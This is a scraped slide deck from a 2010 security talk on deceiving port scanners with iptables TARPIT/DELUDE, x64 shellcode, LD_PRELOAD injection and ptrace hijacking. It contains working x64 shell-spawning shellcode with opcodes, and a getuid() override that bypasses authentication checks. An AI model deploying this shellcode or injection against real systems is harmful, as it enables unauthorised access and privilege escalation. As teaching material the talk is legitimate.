The document discusses various techniques for deception and bypassing security checks, including:
1) Using iptables and the TARPIT and DELUDE targets to deceive port scanners by simulating open ports or terminating connections.
2) Writing x64 shellcode and understanding differences from x86 in CPU registers and the kernel ABI.
3) Performing DL-injection attacks by injecting a dynamic library to override functions like getuid() and bypass authentication.
4) Demonstrating process hijacking using ptrace() to inject shellcode and escalate privileges.
5) Mounting a local privilege escalation attack after gaining initial user access.
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Code Red Security
1. Code Red Security - The Art of Deception - x64 shell codes and kernel ABI - DL-Injection - Hijacking processes with ptrace() - DL-Injection attack vector (Don't try it at home) Session by Amr Ali http://amr-ali.co.cc/ [email_address]
3. The Art of Deception - We are talking today about deceiving port scanners and other reconnaissance tools and/or techniques. Iptables is the main firewall used by Linux users around the world, so we are going to make great use of it with a little but very effective add-on called xtables . - TARPIT and DELUDE are the main targets xtables provides for our purposes. TARPIT captures and holds incoming TCP connections using no local per connection resources. Connections are accepted, but immediately switched to the persist state (0 byte window), in which the remote side stops sending data and asks to continue every 60-240 seconds. Attempts to close the connection are ignored, forcing the remote side to time out the connection in 12-24 minutes. SYN ---------------> Server SYN/ACK <-------------------- Server ACK ----------------------> Server WIN[0] <--------------------- Server
4. The Art of Deception - The DELUDE target will reply to a SYN packet with SYN/ACK, and to all other packets with a RST. This will terminate the connection much like REJECT, but network scanners doing TCP half open discovery can be spoofed to make them believe the port is open rather than closed/filtered. - In lesser words, if someone is doing a SYN scan the response to his packets by a SYN/ACK packet, but will receive a RST if she sent an ACK, so the connection will be terminated much like the REJECT target. Same applies for ACK scan(s). Of course you will have to make sure first that a scan in place, otherwise you will kill legitimate connections. SYN --------------------> Server SYN/ACK <------------------- Server ACK -----------------------> Server RST <------------------------ Server
5. The Art of Deception # nmap -v -A --reason --version-all --script all -T4 -n 192.168.1.100 Starting Nmap 5.00 ( http://nmap.org ) at 2010-04-03 02:56 EET NSE: Loaded 59 scripts for scanning. Initiating SYN Stealth Scan at 02:59 Scanning 192.168.1.100 [1000 ports] Discovered open port 4422/tcp on 192.168.1.100 Discovered open port 6/tcp on 192.168.1.100 Discovered open port 78/tcp on 192.168.1.100 Discovered open port 1337/tcp on 192.168.1.100 Discovered open port 31337/tcp on 192.168.1.100 Discovered open port 88/tcp on 192.168.1.100 Discovered open port 123/tcp on 192.168.1.100 Discovered open port 8879/tcp on 192.168.1.100 Discovered open port 550/tcp on 192.168.1.100 Discovered open port 9200/tcp on 192.168.1.100 Discovered open port 5/tcp on 192.168.1.100 Discovered open port 404/tcp on 192.168.1.100 ........
6. x64 shell codes and kernel ABI - x86 shell coders are very used and familiar with x86 CPU registers, and its plain kernel ABI, which are ..... EAX : Holds the system call number. EBX : Contains the value or address of the 1 st argument to the system call. ECX : Contains the value or address of the 2 nd argument to the system call. EDX : Contains the value or address of the 3 rd argument to the system call. EDI : General purpose register. ESI : General purpose register. EBP : Base Pointer register. ESP : Stack Pointer register. EIP : Instruction Pointer register. These registers are plain and simple, however when it comes to x64 platforms the kernel ABI changes a bit differently in which that extra general purpose registers are added, and system call arguments registers are different.
7. x64 shell codes and kernel ABI - x64 registers and kernel ABI are as fellows … RAX : Contains the system call number. RBX : General purpose register. RCX : General purpose register. RDX : The 3 rd argument for the system call. RDI : The 1 st argument for the system call. RSI : The 2 nd argument for the system call. RBP : Base Pointer register. RSP : Stack Pointer register. RIP : Instruction Pointer register. R8 : The 4 th argument for the system call. R9 : The 5 th argument for the system call. R10 : The 6 th argument for the system call. R11 – R15 : General purpose registers. - Of course these are 64bit register instead of their counter part 32bit registers.
8. x64 shell codes and kernel ABI - Lets write a little x64 shell code, shall we? [CODE] .global _start _start: xorq %rdx, %rdx push %rdx movq $0x68732f6e69622f2f, %rbx # //bin/bash push %rbx push %rsp pop %rdi push %rdx push %rdi push %rsp pop %rsi push $0x3b pop %rax syscall arg1: .string “//bin/sh” [/CODE]
9. x64 shell codes and kernel ABI - So after getting the opcodes for the shell code we've written we now can put it in a string as in the form of … 4831d25248bb2f2f62696e2f736853545f5257545e6a3b580f05 - Now we should compile and run our assembly code to make sure its running... [email_address] (/tmp):$ as test.s -o test.o [email_address] (/tmp):$ ld -s test.o -o test [email_address] (/tmp):$ ./test # Now we have confirmed it is running, its only a matter of writing an exploit and the above shell code in a string to exploit whatever vulnerable piece of code you are targeting.
10. DL-Injection - DL-Injection is done by injecting a dynamic library in a compiled application to override certain functionalities called from other shared libraries. The technique used can be as simple as setting an environment v a riable ( LD_PRELOAD ) and as complex as overwriting certain application PLT ( Procedure Linkage Table ) entries. - This kind of attack can be very useful in applications that does internal authentication and does not ensure the integrity of the information the system provides. For example … [CODE] .... If (getuid() == 0) { // do stuff authenticated stuff here. } ....
11. DL-Injection - The previous code gets the UID of the user and executes certain codes based on that. However it does not make sure that this information is true in the sense that it is not spoofed. - Now we can easily bypass this security check by simply injecting a library into this application space with a function that overrides getuid() that always returns zero. [CODE] Int getuid() { return 0; } [/CODE] [email_address] (/tmp):$ gcc -shared -fPIC inj.c -o inj.so [email_address] (/tmp):$ LD_PRELOAD=/tmp/inj.so ./vuln_app - Now we successfully bypassed that application security, by spoofing getuid() to always return zero.
12. Hijacking Processes – ptrace() - ptrace() is a function used to debug applications by setting breakpoints or monitor the process' registers and memory with the right permissions. We'll see in a few lines a demonstration on how to hijack a process and inject a shell code into its execution flow through overwriting its IP ( Instruction Pointer ). - We'll demonstrate this on a 32bit platform and a 64bit platform to understand further the difference between each platform assembly and kernel ABI. LIVE DEMONSTRATION
13. DL-Injection Attack Vector - We'll now try to mount a local privilege escalation attack on a system, assuming that we already got normal user access.
14. Thanks Thanks All my presentation(s) files will be on my website. If you have any questions or comments please do not hesitate to visit my website or contact me via email http://amr-ali.co.cc [email_address] For job offers, please visit … http://amr-ali.co.cc/resume